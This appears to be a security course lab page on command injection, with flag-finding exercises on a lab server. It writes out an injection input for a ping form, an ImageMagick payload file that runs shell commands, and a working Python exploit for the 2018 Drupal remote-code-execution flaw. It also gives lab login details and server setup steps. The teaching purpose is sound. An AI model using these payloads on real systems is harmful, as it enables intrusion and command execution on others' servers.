ED 102: Command Injection (20 pts + 40 pts extra)


Ping Form (20 pts)

The form below lets you send pings to a remote host. Unfortunately, it has a vulnerability.

To use the form normally, enter a target, such as

127.0.0.1
To see the vulnerability, enter
127.0.0.1; ls
Target IP:    

Challenges: Find the Flags (20 pts)

There are four flags available on this server:

ImageMagick Vulnerability (20 pts)

Normal Usage

  1. Get a normal GIF or JPEG image
  2. Upload it using the buttons below
  3. Click the thumbnail to see your image
Select image to upload:

Vulnerability

Make a text file with these contents:

push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com"|echo "HELLO";date;")'
pop graphic-context
Save it as exploit.jpg. Upload it using the form above on this page.

The "echo" and "date" commands execute, as shown below.

Challenges: Find the Flags (20 pts)

There are two flags available in the "chal2" folder:

Drupal Command Injection (20 pts extra)

Background

In April, 2018, a critical Drupal vulnerability was announced, and exploit code became available, as detailed here:

https://thehackernews.com/2018/04/drupal-rce-exploit-code.html

In this project, you'll perform that attack.

Viewing the Vulnerable Website

In a browser, go to:

https://drupal.samsclass.info/

The site is protected by HTTP basic authentication. Log in with a username of student1 and a password of student1

It's just a default installation of Drupal, as shown below.

Preparing the Attack

Using a text editor, such as nano or Notepad, create a file named dru.py containing this code. Change the filename YOURNAME to something unique in all three places it appears.
import sys
import requests
from requests.auth import HTTPBasicAuth

# Based on https://github.com/a2u/CVE-2018-7600 by Vitalii Rudnykh

target = "https://drupal.samsclass.info/"

url = target + 'user/register?element_parents=account/mail/' \
      + '%23value&ajax_form=1&_wrapper_format=drupal_ajax' 
      
payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 
           'mail[#post_render][]': 'exec', 'mail[#type]': 'markup',
           'mail[#markup]': 'echo ";-)" | tee YOURNAME.txt'}

r = requests.post(url, data=payload, auth=HTTPBasicAuth('student1', 'student1'))

check = requests.get(target + 'YOURNAME.txt', auth=HTTPBasicAuth('student1', 'student1'))
if check.status_code != 200:
  sys.exit("Not exploitable")
  
print ('\nCheck: '+target+'YOURNAME.txt')

Running the Attack

In a Terminal or Command Prompt window, execute this command:
python dru.py
The attack succeeds, creating a file on the target server, as shown below.

Challenges: Find the Flags (20 pts)

There are two flags on this server:

Adding Basic Authentication to Drupal

For my own future refrerence, and for those who wish to develop similar projects, here's how I added the authentication. Students can ignore the contents of this box.
sudo cp /etc/apache2/sites-available/drupal.conf /etc/apache2/sites-available/drupal.conf.orig
sudo nano /etc/apache2/sites-available/drupal.conf
Replace the contents with this:
<VirtualHost *:80>
     ServerAdmin admin@samsclass.info
     DocumentRoot /var/www/html/drupal
     ServerName drupal.samsclass.info
     ServerAlias www.drupal.samsclass.info

     ErrorLog ${APACHE_LOG_DIR}/error.log
     CustomLog ${APACHE_LOG_DIR}/access.log combined

      <Directory /var/www/html/drupal/>
		AuthType Basic
		AuthName "Private"
		AuthUserFile /etc/apache2/.htaccess
		Require valid-user
		AllowOverride None
		Order allow,deny
		allow from all
		Options FollowSymlinks
      </Directory>

      <Directory /var/www/html/drupal>
            RewriteEngine on
            RewriteBase /
            RewriteCond %{REQUEST_FILENAME} !-f
            RewriteCond %{REQUEST_FILENAME} !-d
            RewriteRule ^(.*)$ index.php?q=$1 [L,QSA]
      </Directory>
</VirtualHost>
Save the file.
sudo htpasswd -c /etc/apache2/.htaccess student1
Enter the password student1 twice.
sudo service apache2 restart


Posted 4-21-19
ImageMagick & Drupal added 4-23-19
Extra credit portion labelled 8-17-19
HTTP Basic Authentication added 9-12-19